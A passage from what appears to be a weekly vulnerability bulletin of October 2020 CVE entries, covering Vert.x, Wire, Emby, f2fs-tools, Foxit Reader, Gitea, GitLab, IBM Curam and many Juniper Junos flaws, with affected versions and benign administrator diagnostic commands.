In Eclipse Vert.x 3.4.x up to 3.9.4, 4.0.0.milestone1, 4.0.0.milestone2, 4.0.0.milestone3, 4.0.0.milestone4, 4.0.0.milestone5, 4.0.0.Beta1, 4.0.0.Beta2, and 4.0.0.Beta3, StaticHandler doesn’t correctly process backslashes on Windows operating systems, allowing escape from the webroot folder to the current working directory. 2020-10-15 not yet calculated CVE-2019-17640
CONFIRM
electron — wire
 
In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victim’s machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL’s protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory. 2020-10-16 not yet calculated CVE-2020-15258
MISC
MISC
CONFIRM
emby — emby_server
 
Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. 2020-10-10 not yet calculated CVE-2020-26948
MISC
MISC
excast — pro_ii
 
In EZCast Pro II, the administrator password md5 hash is provided upon a web request. This hash can be cracked to access the administration panel of the device. 2020-10-16 not yet calculated CVE-2019-12305
MISC
excellium — helpdeskz
 
** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-10-12 not yet calculated CVE-2020-26546
MISC
f2fs-tools — f2fs-tools

An exploitable code execution vulnerability exists in the multiple devices functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause an information overwrite resulting in code execution. An attacker can provide a malicious file to trigger this vulnerability. 2020-10-15 not yet calculated CVE-2020-6105
MISC
f2fs-tools — f2fs-tools
 
An exploitable information disclosure vulnerability exists in the get_dnode_of_data functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause information disclosure resulting in an information disclosure. An attacker can provide a malicious file to trigger this vulnerability. 2020-10-15 not yet calculated CVE-2020-6104
MISC
f2fs-tools — f2fs-tools
 
An exploitable information disclosure vulnerability exists in the init_node_manager functionality of F2fs-Tools F2fs.Fsck 1.12 and 1.13. A specially crafted filesystem can be used to disclose information. An attacker can provide a malicious file to trigger this vulnerability. 2020-10-15 not yet calculated CVE-2020-6106
MISC
f2fs-tools — f2fs-tools
 
An exploitable code execution vulnerability exists in the fsck_chk_orphan_node functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability. 2020-10-15 not yet calculated CVE-2020-6108
MISC
f2fs-tools — f2fs-tools
 
An exploitable information disclosure vulnerability exists in the dev_read functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause an uninitialized read resulting in an information disclosure. An attacker can provide a malicious file to trigger this vulnerability. 2020-10-15 not yet calculated CVE-2020-6107
MISC
foxit — reader
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.1.35811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11657. 2020-10-13 not yet calculated CVE-2020-17417
N/A
N/A
foxit — reader
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11497. 2020-10-13 not yet calculated CVE-2020-17416
N/A
N/A
gitea — gitea
 
The git hook feature in Gitea 1.1.0 through 1.12.5 allows for authenticated remote code execution. 2020-10-16 not yet calculated CVE-2020-14144
MISC
MISC
MISC
gitlab — gitlab
 
An issue has been discovered in GitLab affecting all versions prior to 13.2.10, 13.3.7 and 13.4.2. Insufficient permission check allows attacker with developer role to perform various deletions. 2020-10-12 not yet calculated CVE-2020-13341
CONFIRM
MISC
MISC
gogs — gogs
 
The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. 2020-10-16 not yet calculated CVE-2020-15867
MISC
google — android
 
In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-161151868. References: N/A 2020-10-14 not yet calculated CVE-2020-0423
MISC
google — android
 
This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks:
1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links.
2. All apk downloads, either organic or not.
Mintegral listens to download events in Android’s download manager and detects if the downloaded file’s url contains:
a. google.com or comes from a Google app (the com.android.vending package)
b. Ends with .apk for apk downloads
In both cases, the module sends the captured data back to Mintegral’s servers. Note that the malicious functionality keeps running even if the app is currently not in focus (running in the background). 2020-10-15 not yet calculated CVE-2020-7744
MISC
MISC
MISC
grocy — grocy
 
Versions of Grocy <= 2.7.1 are vulnerable to Cross-Site Scripting via the Create Shopping List module, that is rendered upon deleting that Shopping List. The issue was also found in users, batteries, chores, equipment, locations, quantity units, shopping locations, tasks, taskcategories, product groups, recipes and products. Authentication is required to exploit these issues and Grocy should not be publicly exposed. The linked reference details a proof-of-concept. 2020-10-14 not yet calculated CVE-2020-15253
MISC
MISC
MISC
CONFIRM
huawei — mate_20_devices
 
There is an information disclosure vulnerability in several smartphones. The device does not sufficiently validate the identity of a smart wearable device in certain specific scenarios. The attacker needs to gain certain information in the victim’s smartphone to launch the attack, and a successful exploit could cause information disclosure. Affected product versions include: HUAWEI Mate 20 versions earlier than 10.1.0.160(C00E160R3P8), versions earlier than 10.1.0.160(C01E160R2P8); HUAWEI Mate 20 X versions earlier than 10.1.0.160(C00E160R2P8), versions earlier than 10.1.0.160(C01E160R2P8); HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8); Laya-AL00EP versions earlier than 10.1.0.160(C786E160R3P8); Tony-AL00B versions earlier than 10.1.0.160(C00E160R2P11); Tony-TL00B versions earlier than 10.1.0.160(C01E160R2P11). 2020-10-12 not yet calculated CVE-2020-9109
MISC
huawei — p30_pro_devices
 
HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) and versions earlier than 10.1.0.160(C01E160R2P8) have a buffer overflow vulnerability. An attacker induces users to install malicious applications and sends specially constructed packets to affected devices after obtaining the root permission. Successful exploit may cause code execution. 2020-10-12 not yet calculated CVE-2020-9123
MISC
ibm — curam_social_program_management
 
An improper input validation before calling java readLine() method may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could result in a denial of service. IBM X-Force ID: 189159. 2020-10-12 not yet calculated CVE-2020-4781
XF
CONFIRM
ibm — curam_social_program_management
 
An XPath vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, caused by the improper handling of user-supplied input. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to obtain unauthorized access or reveal sensitive information such as XML document structure and content. IBM X-Force ID: 189152. 2020-10-12 not yet calculated CVE-2020-4774
XF
CONFIRM
ibm — curam_social_program_management
 
An HTTP Verb Tampering vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass security access controls. IBM X-Force ID: 189156. 2020-10-12 not yet calculated CVE-2020-4779
XF
CONFIRM
ibm — curam_social_program_management
 
A cross-site request forgery (CSRF) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which is an attack that forces a user to execute unwanted actions on the web application while they are currently authenticated. This applies to a single server class only, with no impact to remainder of web application. IBM X-Force ID: 189151. 2020-10-12 not yet calculated CVE-2020-4773
XF
CONFIRM
ibm — curam_social_program_management
 
OOTB build scripts do not set the secure attribute on the session cookie, which may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. The purpose of the ‘secure’ attribute is to prevent cookies from being observed by unauthorized parties. IBM X-Force ID: 189158. 2020-10-12 not yet calculated CVE-2020-4780
XF
CONFIRM
ibm — curam_social_program_management
 
An XML External Entity Injection (XXE) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. A remote attacker could exploit this vulnerability to expose sensitive information, cause a denial of service, perform server-side request forgery or consume memory resources. IBM X-Force ID: 189150. 2020-10-12 not yet calculated CVE-2020-4772
XF
CONFIRM
ibm — curam_social_program_management
 
IBM Curam Social Program Management 7.0.9 and 7.0.10 uses the MD5 algorithm for hashing a token in a single instance, which is less safe than the default SHA-256 cryptographic algorithm used throughout the Cúram application. IBM X-Force ID: 189156. 2020-10-12 not yet calculated CVE-2020-4778
XF
CONFIRM
ibm — curam_social_program_management
 
A path traversal vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted file path in URL request to view arbitrary files on the system. IBM X-Force ID: 189154. 2020-10-12 not yet calculated CVE-2020-4776
XF
CONFIRM
ibm — resilient_onprem
 
IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503. 2020-10-16 not yet calculated CVE-2020-4636
XF
CONFIRM
ibm — security_access_manager
 
IBM Security Access Manager Appliance 9.0.7 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 179358. 2020-10-14 not yet calculated CVE-2020-4395
XF
CONFIRM
ibm — security_access_manager_and_security_verify_access
 
IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive information using timing side channel attacks, which could aid in further attacks against the system. IBM X-Force ID: 186947. 2020-10-12 not yet calculated CVE-2020-4699
XF
CONFIRM
ibm — security_access_manager_and_security_verify_access
 
IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an unauthorized public Oauth client to bypass some or all of the authentication checks and gain access to applications. IBM X-Force ID: 182216. 2020-10-15 not yet calculated CVE-2020-4499
XF
CONFIRM
ibm — security_access_manager_and_security_verify_access
 
IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive information using timing side channel attacks, which could aid in further attacks against the system. IBM X-Force ID: 186142. 2020-10-12 not yet calculated CVE-2020-4661
XF
CONFIRM
ibm — security_access_manager_and_security_verify_access
 
IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive information using timing side channel attacks, which could aid in further attacks against the system. IBM X-Force ID: 186140. 2020-10-12 not yet calculated CVE-2020-4660
XF
CONFIRM
ibm — security_access_manager_and_security_verify_access
 
IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 are vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. IBM X-Force ID: 165960. 2020-10-15 not yet calculated CVE-2019-4552
XF
CONFIRM
ibm — security_guardium_big_data_intelligence
 
IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560. 2020-10-16 not yet calculated CVE-2020-4254
XF
CONFIRM
iproom — mmc+_server
 
IProom MMC+ Server login page does not validate specific parameters properly. Attackers can use the vulnerability to redirect to any malicious site and steal the victim’s login credentials. 2020-10-14 not yet calculated CVE-2020-24551
MISC
jfrog — artifactory
 
Jfrog Artifactory uses default passwords (such as “password”) for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0. 2020-10-12 not yet calculated CVE-2019-17444
MISC
MISC
juniper_networks — ex2300_series_devices
 
On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command:
    user@host> show chassis routing-engine
    Routing Engine status:
    …
    Idle 2 percent
the “Idle” value shows as low (2 % in the example above), and also the following command:
    user@host> show system processes summary
    …
    PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND
    11639 root 52 0 283M 11296K select 12:15 44.97% eventd
    11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc}
the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1668
CONFIRM
juniper_networks — ex4300_series_devices
 
On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issues and traffic interruption. These specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1670
MISC
juniper_networks — ex4600_and_qfx_5000_series_devices
 
When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to:
    family ethernet-switching {
        filter L2-VLAN {
            term ALLOW {
                from {
                    user-vlan-id 100;
                }
                then {
                    accept;
                }
            }
            term NON-MATCH {
                then {
                    discard;
                }
            }
when there is only one term containing a ‘user-vlan-id’ match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under ‘user-vlan-id’. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1685
CONFIRM
juniper_networks — junos_mx_series_devices
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing “URL Filtering service”, can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1667
MISC
juniper_networks — junos_os
 
A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability. 2020-10-16 not yet calculated CVE-2020-1664
CONFIRM
juniper_networks — junos_os
 
Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user’s HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes:
    user@device> show system processes | match http
    5260 - S 0:00.13 /usr/sbin/httpd-gk -N
    5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf
In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1673
CONFIRM
juniper_networks — junos_os
 
Juniper Networks Junos OS and Junos OS Evolved fail to drop/discard delayed MACsec packets (e.g. delayed by more than 2 seconds). Per the specification, called the “bounded receive delay”, there should be no replies to delayed MACsec packets. Any MACsec traffic delayed more than 2 seconds should be dropped and late drop counters should increment. Without MACsec delay protection, an attacker could exploit the delay to spoof or decrypt packets. This issue affects: Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8, 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: all versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R2-EVO. This issue does not affect Junos OS versions prior to 16.1R1. 2020-10-16 not yet calculated CVE-2020-1674
MISC
CONFIRM
MISC
juniper_networks — junos_os
 
On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5. 2020-10-16 not yet calculated CVE-2020-1661
CONFIRM
juniper_networks — junos_os
 
On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packet can trigger this issue. DHCPv4 packet cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1672
CONFIRM
juniper_networks — junos_os
 
The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHCPv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1656
CONFIRM
MISC
MISC
MISC
juniper_networks — junos_os
 
On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting with the restart of the daemon. This issue only affects DHCPv6, it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; This issue does not affect Juniper Networks Junos OS prior to 17.4R1. 2020-10-16 not yet calculated CVE-2020-1671
CONFIRM
juniper_networks — junos_os_and_junos_os_evolved
 
On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the “show task memory detail | match policy | match evpn” command multiple times to check if memory (Alloc Blocks value) is increasing.
    root@device> show task memory detail | match policy | match evpn
    ———————— Allocator Memory Report ————————
    Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes
    Policy EVPN Params 20 24 3330678 79936272 3330678 79936272
    root@device> show task memory detail | match policy | match evpn
    ———————— Allocator Memory Report ————————
    Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes
    Policy EVPN Params 20 24 36620255 878886120 36620255 878886120
This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO. 2020-10-16 not yet calculated CVE-2020-1678
CONFIRM
juniper_networks — junos_os_and_junos_os_evolved_devices
 
On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages:
    rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master)
    rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master)
    rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000
    kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover
This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3. 2020-10-16 not yet calculated CVE-2020-1662
CONFIRM
juniper_networks — junos_os_devices
 
On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be triggered by a malformed IPv6 packet destined to the Routing Engine or a transit packet that is sampled using sFlow/jFlow or processed by firewall filter with the syslog and/or log action. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1. 2020-10-16 not yet calculated CVE-2020-1686
CONFIRM
juniper_networks — junos_os_devices
 
